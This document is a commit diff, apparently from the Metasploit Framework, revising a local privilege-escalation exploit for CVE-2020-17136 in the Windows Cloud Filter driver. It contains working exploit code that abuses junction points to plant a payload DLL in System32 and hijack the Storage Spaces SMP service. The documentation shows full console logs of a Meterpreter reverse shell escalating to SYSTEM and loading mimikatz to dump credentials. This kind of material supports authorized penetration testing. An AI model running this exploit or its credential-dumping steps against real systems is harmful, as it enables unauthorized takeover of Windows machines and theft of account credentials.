Make second round of review edits to fix Spencer's comments

2024-07-18 18:31:41 +02:00 · 2021-01-08 12:50:52 -06:00 · 2021-01-08 12:50:52 -06:00 · 3072391d00
commit 3072391d00
parent d5bb36c530
4 changed files with 85 additions and 79 deletions
--- a/data/exploits/CVE-2020-17136/cloudFilterEOP.exe
+++ b/data/exploits/CVE-2020-17136/cloudFilterEOP.exe
--- a/documentation/modules/exploit/windows/local/cve_2020_17136.md
+++ b/documentation/modules/exploit/windows/local/cve_2020_17136.md
@ -7,21 +7,23 @@ security checks that would otherwise prevent a normal user from being able to cr
 they don't have permissions to create files in.

 This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
-Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. The module
-then uses RPCSS named pipe impersonation to obtain a `SYSTEM` token and assign it to the current process,
-thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user.
+Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are
+strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will
+allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using
+Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate
+the `SYSTEM` user.

 ### Installation And Setup
 `cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later.

 ## Verification Steps
  1. Start msfconsole
-  2. Get a meterpreter shell as a low privileged user.
+  2. Get a shell as a low privileged user.
  3. **Verify** that `getsystem` does not get you a `SYSTEM` shell.
  4. `use exploit/windows/local/cve_2020_17136`
  5. `set session *session id*`
  6. `run`
-  7. **Verify** that you get a new shell as the `SYSTEM` user
+  7. **Verify** that you get a new shell as the `N` user

 ## Options

@ -43,7 +45,7 @@ msf6 exploit(multi/handler) > run

 [*] Started bind TCP handler against 172.22.152.177:4444
 [*] Sending stage (200262 bytes) to 172.22.152.177
-[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-06 01:26:51 -0600
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600

 meterpreter > getuid
 Server username: DESKTOP-KUO5CML\normal
@ -60,14 +62,6 @@ SeShutdownPrivilege
 SeTimeZonePrivilege
 SeUndockPrivilege

-meterpreter > sysinfo
-Computer        : DESKTOP-KUO5CML
-OS              : Windows 10 (10.0 Build 19041).
-Architecture    : x64
-System Language : en_US
-Domain          : WORKGROUP
-Logged On Users : 5
-Meterpreter     : x64/windows
 meterpreter > getsystem
 [-] 2001: Operation failed: Access is denied. The following was attempted:
 [-] Named Pipe Impersonation (In Memory/Admin)
@ -78,16 +72,20 @@ meterpreter > background
 [*] Backgrounding session 1...
 msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
 [*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
+SESSION => 1
+msf6 exploit(windows/local/cve_2020_17136) > check
+[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
 msf6 exploit(windows/local/cve_2020_17136) > show options

 Module options (exploit/windows/local/cve_2020_17136):

-   Name            Current Setting  Required  Description
-   ----            ---------------  --------  -----------
-   AMSIBYPASS      true             yes       Enable Amsi bypass
-   ETWBYPASS       true             yes       Enable Etw bypass
-   SESSION                          yes       The session to run this module on.
-   WAIT            5                no        Time in seconds to wait
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   AMSIBYPASS  true             yes       Enable Amsi bypass
+   ETWBYPASS   true             yes       Enable Etw bypass
+   SESSION     1                yes       The session to run this module on.
+   WAIT        5                no        Time in seconds to wait


 Payload options (windows/x64/meterpreter/reverse_tcp):
@ -106,36 +104,52 @@ Exploit target:
   0   Windows DLL Dropper


-msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
-SESSION => 1
 msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
 LHOST => 172.22.159.28
-msf6 exploit(windows/local/cve_2020_17136) > set LPORT 6688
-LPORT => 6688
 msf6 exploit(windows/local/cve_2020_17136) > run

-[*] Started reverse TCP handler on 172.22.159.28:6688
+[*] Started reverse TCP handler on 172.22.159.28:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
-[*] Dropping payload dll at C:\Windows\Temp\WsutUtXDcIsPqEKn.dll and registering it for cleanup...
+[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...
 [*] Running module against DESKTOP-KUO5CML
 [*] Launching notepad.exe to host CLR...
-[+] Process 7784 launched.
-[*] Reflectively injecting the Host DLL into 7784..
-[*] Injecting Host into 7784...
-[*] Host injected. Copy assembly into 7784...
+[+] Process 100 launched.
+[*] Reflectively injecting the Host DLL into 100..
+[*] Injecting Host into 100...
+[*] Host injected. Copy assembly into 100...
 [*] Assembly copied.
 [*] Executing...
 [*] Start reading output
-[+] Key: 1821285265184
+[+] Sync connection key: 2733760425760
 [+] Done
 [*] End output.
 [+] Execution finished.
 [*] Sending stage (200262 bytes) to 172.22.152.177
-[*] Meterpreter session 2 opened (172.22.159.28:6688 -> 172.22.152.177:62867) at 2021-01-06 01:28:26 -0600
-[*] Session ID 2 (172.22.159.28:6688 -> 172.22.152.177:62867) processing AutoRunScript 'post/windows/escalate/getsystem'
-[+] Obtained SYSTEM via technique 4
+[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600

+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeAssignPrimaryTokenPrivilege
+SeAuditPrivilege
+SeChangeNotifyPrivilege
+SeCreateGlobalPrivilege
+SeImpersonatePrivilege
+SeIncreaseQuotaPrivilege
+SeIncreaseWorkingSetPrivilege
+SeShutdownPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > getsystem
+...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > getprivs
@ -157,7 +171,7 @@ SeTimeZonePrivilege
 SeUndockPrivilege

 meterpreter > load kiwi
-Loading extension kiwi...cre
+Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
@ -198,8 +212,8 @@ normal            DESKTOP-KUO5CML  (null)
 test              DESKTOP-KUO5CML  (null)


-meterpreter > background
-[*] Backgrounding session 2...
+meterpreter >
+Background session 2? [y/N]
 msf6 exploit(windows/local/cve_2020_17136) > sessions

 Active sessions
@ -208,7 +222,7 @@ Active sessions
  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  1         meterpreter x64/windows  DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML  0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
-  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML     172.22.159.28:6688 -> 172.22.152.177:62867 (172.22.152.177)
+  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML     172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)

 msf6 exploit(windows/local/cve_2020_17136) >
 ```
--- a/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs
+++ b/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs
@ -590,7 +590,7 @@ namespace POC_CloudFilter_ArbitraryFile_EoP
                    CfConnectSyncRoot(SyncRoot, table, IntPtr.Zero, CF_CONNECT_FLAGS.CF_CONNECT_FLAG_NONE, out long key).Check();
                    try
                    {
-                        Console.WriteLine("Key: {0}", key);
+                        Console.WriteLine("Sync connection key: {0}", key);
                        CF_PLACEHOLDER_CREATE_INFO[] place_holders = new CF_PLACEHOLDER_CREATE_INFO[1];
                        place_holders[0].RelativeFileName = FilePath;
                        CF_FS_METADATA meta_data = new CF_FS_METADATA
--- a/modules/exploits/windows/local/cve_2020_17136.rb
+++ b/modules/exploits/windows/local/cve_2020_17136.rb
@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Dotnet
  include Msf::Post::Windows::Services
+  include Msf::Post::Windows::FileSystem
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

@ -20,17 +21,20 @@ class MetasploitModule < Msf::Exploit::Local
        info,
        'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',
        'Description' => %q{
-          The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates,
-          did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling
-          FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker
-          controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any
-          security checks that would otherwise prevent a normal user from being able to create files in directories
+          The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December
+          2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when
+          calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()
+          function with attacker controlled input. This meant that files were created with
+          KernelMode permissions, thereby bypassing any security checks that would otherwise
+          prevent a normal user from being able to create files in directories
          they don't have permissions to create files in.

-          This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
-          Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. The module
-          then uses RPCSS named pipe impersonation to obtain a SYSTEM token and assign it to the current process,
-          thereby allowing the attacker to execute arbitrary code as the SYSTEM user.
+          This module abuses this vulnerability to perform a DLL hijacking attack against the
+          Microsoft Storage Spaces SMP service, which grants the attacker code execution as the
+          NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one
+          of the Meterpreter payloads, as doing so will allow them to subsequently escalate their
+          new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command
+          to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
@ -40,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Privileged' => true,
-        'Arch' => [ARCH_X86, ARCH_X64],
+        'Arch' => [ARCH_X64],
        'Targets' =>
          [
            [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
@ -62,7 +66,6 @@ class MetasploitModule < Msf::Exploit::Local
          {
            'EXITFUNC' => 'process',
            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
-            'AUTORUNSCRIPT' => 'post/windows/escalate/getsystem'
          }
      )
    )
@ -81,23 +84,6 @@ class MetasploitModule < Msf::Exploit::Local
    )
  end

-  def find_required_clr(exe_path)
-    filecontent = File.read(exe_path).bytes
-    sign = 'v4.0.30319'.bytes
-    filecontent.each_with_index do |_item, index|
-      sign.each_with_index do |subitem, indexsub|
-        break if subitem.to_s(16) != filecontent[index + indexsub].to_s(16)
-
-        if indexsub == 9
-          vprint_status('CLR version required: v4.0.30319')
-          return 'v4.0.30319'
-        end
-      end
-    end
-    vprint_status('CLR version required: v2.0.50727')
-    'v2.0.50727'
-  end
-
  def check_requirements(clr_req, installed_dotnet_versions)
    installed_dotnet_versions.each do |fi|
      if clr_req == 'v4.0.30319'
@ -116,7 +102,6 @@ class MetasploitModule < Msf::Exploit::Local

  def check
    sysinfo_value = sysinfo['OS']
-
    if sysinfo_value !~ /windows/i
      # Non-Windows systems are definitely not affected.
      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
@ -153,23 +138,29 @@ class MetasploitModule < Msf::Exploit::Local
  def exploit
    if sysinfo['Architecture'] != 'x64'
      fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
+    elsif session.arch != 'x64'
+      fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!')
    end
    dir_junct_path = 'C:\\Windows\\Temp'
    intermediate_dir = rand_text_alpha(10).to_s
    junction_dir = rand_text_alpha(10).to_s
+    path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}"

-    cd(dir_junct_path)
-    mkdir(intermediate_dir)
-    if !directory?("#{dir_junct_path}\\#{intermediate_dir}")
+    mkdir("#{path_to_intermediate_dir}")
+    if !directory?("#{path_to_intermediate_dir}")
      fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
    end
-    register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}")
+    register_dir_for_cleanup("#{path_to_intermediate_dir}")

-    cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"")
-    if !directory?("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
-      fail_with(Failure::UnexpectedReply, 'Could not create the junction directory!')
+    mkdir("#{path_to_intermediate_dir}\\#{junction_dir}")
+    if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
+      fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')
+    end
+
+    mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')
+    if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
+      fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')
    end
-    register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")

    exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
    unless File.file?(exe_path)
@ -180,17 +171,18 @@ class MetasploitModule < Msf::Exploit::Local
    if installed_dotnet_versions == []
      fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
    end
-    rclr = find_required_clr(exe_path)
-    if check_requirements(rclr, installed_dotnet_versions) == false
+    if check_requirements('v4.0.30319', installed_dotnet_versions) == false
      fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
    end
    payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
    print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
    write_file(payload_path, generate_payload_dll)
    register_file_for_cleanup(payload_path)
-    execute_assembly(exe_path, "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
+    execute_assembly(exe_path, "#{path_to_intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
    service_start('smphost')
    register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
+    sleep(3)
+    delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle)
  end

  def pid_exists(pid)